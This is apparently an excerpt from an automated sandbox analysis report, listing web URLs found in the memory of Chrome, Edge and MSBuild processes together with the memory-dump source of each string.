Source: chrome.exe, 00000009.00000002.1506680941.000062740179C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1500661442.0000627400718000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1501980007.0000627400A68000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1499539138.00006274003D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1504549216.0000627401260000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2122740081.00000E7C01284000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2026567177.00000E7C00866000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000025.00000002.2122740081.00000E7C01284000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default.html
Source: chrome.exe, 00000009.00000002.1506680941.000062740179C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultdefault
Source: MSBuild.exe, 0000001D.00000002.1868398435.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: chrome.exe, 00000009.00000002.1505334583.0000627401364000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://metro.co.uk
Source: chrome.exe, 00000009.00000002.1505334583.0000627401364000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://momento.dev
Source: msedge.exe, 00000011.00000002.1614715541.000074DC00304000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000002.2161079144.000001D004760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://msn.cn/
Source: msedge.exe, 00000011.00000002.1614715541.000074DC00304000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000002.2161079144.000001D004760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://msn.com/
Source: msedge.exe, 00000011.00000002.1614715541.000074DC00304000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://msn.com/Y
Source: chrome.exe, 00000009.00000002.1506510321.000062740167C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1502231831.0000627400B1C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1502858837.0000627400D34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2027403309.00000E7C00A9C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2120741306.00000E7C01128000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000009.00000002.1503583426.0000627400F88000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1502148140.0000627400ABC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1502858837.0000627400D34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2126317892.00000E7C014E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2030101637.00000E7C00D00000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2027332472.00000E7C00A1C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000009.00000002.1503583426.0000627400F88000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1502148140.0000627400ABC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1502858837.0000627400D34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2126317892.00000E7C014E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2030101637.00000E7C00D00000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2027332472.00000E7C00A1C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000009.00000003.1462482924.0000627401A90000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1404875334.0000627000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.1823112100.00000E7800404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2023414760.00000E7800630000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
Source: chrome.exe, 00000009.00000002.1503583426.0000627400F88000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1502148140.0000627400ABC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1502858837.0000627400D34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2026567177.00000E7C0083C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2030101637.00000E7C00D00000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2027332472.00000E7C00A1C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000009.00000002.1502667913.0000627400C94000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1415730303.0000627401178000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2123057256.00000E7C012BC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2017390813.000002351B9E0000.00000002.00000001.00040000.00000011.sdmp, chrome.exe, 00000025.00000002.2028896464.00000E7C00BE0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000009.00000002.1505334583.0000627401364000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://nexxen.tech
Source: chrome.exe, 00000009.00000002.1499117654.00006274001E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2024610980.00000E7C00224000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000009.00000002.1499212304.0000627400218000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2024610980.00000E7C00224000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: msedge.exe, 00000011.00000002.1614715541.000074DC00304000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000002.2161079144.000001D004760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://office.net/
Source: chrome.exe, 00000009.00000003.1458282992.0000627400650000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1461314893.0000627401A14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1459911143.0000627401488000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1460982790.00006274019BC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1507813856.0000627401980000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000009.00000002.1491947662.0000011BC3C47000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyn
Source: chrome.exe, 00000025.00000002.2128807408.00000E7C01938000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2128740426.00000E7C0190C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2128709445.00000E7C018F8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000009.00000003.1458282992.0000627400650000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1461314893.0000627401A14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1459911143.0000627401488000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1460982790.00006274019BC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1507813856.0000627401980000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000009.00000003.1458282992.0000627400650000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1461314893.0000627401A14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1459911143.0000627401488000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1460982790.00006274019BC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1507813856.0000627401980000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000009.00000002.1505334583.0000627401364000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://open-bid.com
Source: chrome.exe, 00000009.00000002.1504853866.000062740131C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1503838003.0000627401054000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1504665705.00006274012B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125218416.00000E7C01424000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.1864561380.00000E7C010A8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2119898152.00000E7C010A4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125337114.00000E7C0143C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125057489.00000E7C01404000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000009.00000002.1505172050.0000627401328000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1505225553.0000627401338000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1504853866.000062740131C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1501319566.0000627400924000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1504665705.00006274012B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125218416.00000E7C01424000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125665338.00000E7C0146C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2124404454.00000E7C013B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125057489.00000E7C01404000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000009.00000002.1505172050.0000627401328000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1415468939.0000627400A5C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1504853866.000062740131C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1504665705.00006274012B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125665338.00000E7C0146C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125057489.00000E7C01404000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000009.00000002.1504853866.000062740131C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1504665705.00006274012B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125218416.00000E7C01424000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125057489.00000E7C01404000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000009.00000002.1505172050.0000627401328000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1415468939.0000627400A5C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1504853866.000062740131C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1504665705.00006274012B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125218416.00000E7C01424000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125665338.00000E7C0146C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125057489.00000E7C01404000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000009.00000002.1504853866.000062740131C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1502697419.0000627400CAC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1504665705.00006274012B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125218416.00000E7C01424000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2024367187.00000E7C001A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125057489.00000E7C01404000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000009.00000002.1504853866.000062740131C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1503838003.0000627401054000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1504665705.00006274012B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125218416.00000E7C01424000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.1864561380.00000E7C010A8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2119898152.00000E7C010A4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125057489.00000E7C01404000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000009.00000002.1501531230.00006274009BC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1503838003.0000627401054000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1504665705.00006274012B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125665338.00000E7C0146C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2124404454.00000E7C013B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125337114.00000E7C0143C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2125057489.00000E7C01404000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000009.00000002.1499212304.0000627400218000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2024610980.00000E7C00224000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000009.00000003.1458070390.0000627400604000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1458148054.00006274014E0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1457978701.00006274014C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.1885804806.00000E7C0157C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2025726677.00000E7C00580000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.1885877727.00000E7C0159C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://outlook.office.com/calendar/
Source: chrome.exe, 00000009.00000002.1490020185.0000011BBF260000.00000002.00000001.00040000.00000011.sdmp, chrome.exe, 00000025.00000002.2017390813.000002351B9E0000.00000002.00000001.00040000.00000011.sdmp String found in binary or memory: https://passwords.google.comSaved
Source: chrome.exe, 00000009.00000002.1502007286.0000627400A76000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2026983498.00000E7C00940000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://passwords.google/
Source: chrome.exe, 00000009.00000002.1499117654.00006274001E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2024610980.00000E7C00224000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://people.googleapis.com/
Source: msedge.exe, 00000011.00000003.1534033277.000074DC00268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000011.00000003.1534180385.000074DC0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055568943.000001D004668000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055975540.000001D00466C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/AddSession
Source: msedge.exe, 00000011.00000003.1534033277.000074DC00268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000011.00000003.1534180385.000074DC0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055568943.000001D004668000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055975540.000001D00466C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/Logout
Source: msedge.exe, 00000011.00000003.1534033277.000074DC00268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000011.00000003.1534180385.000074DC0026C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
Source: msedge.exe, 00000011.00000003.1534033277.000074DC00268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000011.00000003.1534180385.000074DC0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055568943.000001D004668000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055975540.000001D00466C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/MergeSession
Source: msedge.exe, 00000011.00000003.1534033277.000074DC00268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000011.00000003.1534180385.000074DC0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055568943.000001D004668000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055975540.000001D00466C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/OAuthLogin
Source: msedge.exe, 00000011.00000003.1534033277.000074DC00268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000011.00000003.1534180385.000074DC0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055568943.000001D004668000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055975540.000001D00466C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
Source: msedge.exe, 00000011.00000003.1534033277.000074DC00268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000011.00000003.1534180385.000074DC0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055568943.000001D004668000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055975540.000001D00466C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
Source: msedge.exe, 00000011.00000003.1534033277.000074DC00268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000011.00000003.1534180385.000074DC0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055568943.000001D004668000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055975540.000001D00466C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
Source: msedge.exe, 00000011.00000003.1534033277.000074DC00268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000011.00000003.1534180385.000074DC0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055568943.000001D004668000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055975540.000001D00466C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
Source: msedge.exe, 00000011.00000003.1534033277.000074DC00268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000011.00000003.1534180385.000074DC0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055568943.000001D004668000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055975540.000001D00466C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
Source: msedge.exe, 00000011.00000003.1534033277.000074DC00268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000011.00000003.1534180385.000074DC0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055568943.000001D004668000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055975540.000001D00466C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
Source: msedge.exe, 00000011.00000003.1534033277.000074DC00268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000011.00000003.1534180385.000074DC0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055568943.000001D004668000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055975540.000001D00466C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
Source: msedge.exe, 00000011.00000003.1534033277.000074DC00268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000011.00000003.1534180385.000074DC0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055568943.000001D004668000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055975540.000001D00466C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
Source: msedge.exe, 00000011.00000003.1534033277.000074DC00268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000011.00000003.1534180385.000074DC0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055568943.000001D004668000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000032.00000003.2055975540.000001D00466C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
Source: chrome.exe, 00000009.00000002.1505334583.0000627401364000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://permutive.app
Source: chrome.exe, 00000009.00000002.1505334583.0000627401364000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://pinterest.com
Source: MSBuild.exe, 0000001D.00000002.1868398435.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: chrome.exe, 00000009.00000002.1490020185.0000011BBF260000.00000002.00000001.00040000.00000011.sdmp, chrome.exe, 00000009.00000002.1502667913.0000627400C94000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1415730303.0000627401178000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2123057256.00000E7C012BC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2017390813.000002351B9E0000.00000002.00000001.00040000.00000011.sdmp, chrome.exe, 00000025.00000002.2028896464.00000E7C00BE0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000009.00000002.1505334583.0000627401364000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://postrelease.com
Source: chrome.exe, 00000009.00000002.1500999730.0000627400838000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2025481249.00000E7C004B8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000009.00000002.1500999730.0000627400838000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2025481249.00000E7C004B8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: MSBuild.exe, 0000001D.00000002.1868398435.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: MSBuild.exe, 0000001D.00000002.1868398435.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: MSBuild.exe, 0000001D.00000002.1868398435.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: chrome.exe, 00000009.00000002.1499661686.0000627400414000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2025314900.00000E7C00464000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000009.00000002.1505334583.0000627401364000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://samplicio.us
Source: chrome.exe, 00000009.00000002.1498525224.00006274000A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2023690428.00000E7C00090000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyA2KlwBX3mkFo30om9LU
Source: chrome.exe, 00000009.00000002.1499212304.0000627400218000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1503150126.0000627400E4C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2024610980.00000E7C00224000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2030899975.00000E7C00DDC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000009.00000002.1505334583.0000627401364000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://semafor.com
Source: chrome.exe, 00000009.00000002.1505334583.0000627401364000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://shared-storage-demo-publisher-a.web.app
Source: chrome.exe, 00000009.00000003.1462482924.0000627401AE8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.com
Source: chrome.exe, 00000009.00000003.1462482924.0000627401A90000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1404875334.0000627000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.1823112100.00000E7800404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2023414760.00000E7800630000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 00000009.00000002.1505334583.0000627401364000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://shinobi.jp
Source: chrome.exe, 00000009.00000002.1506616088.0000627401778000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1502459813.0000627400BEC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.1502966362.0000627400DB0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2027090326.00000E7C00994000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2028176985.00000E7C00B44000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2030338097.00000E7C00D2C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: MSBuild.exe, 0000001D.00000002.1868398435.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: chrome.exe, 00000009.00000002.1505334583.0000627401364000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://snapchat.com
Source: chrome.exe, 00000025.00000002.2024736190.00000E7C002F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000009.00000002.1499760435.0000627400451000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: MSBuild.exe, 0000001D.00000002.1868398435.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
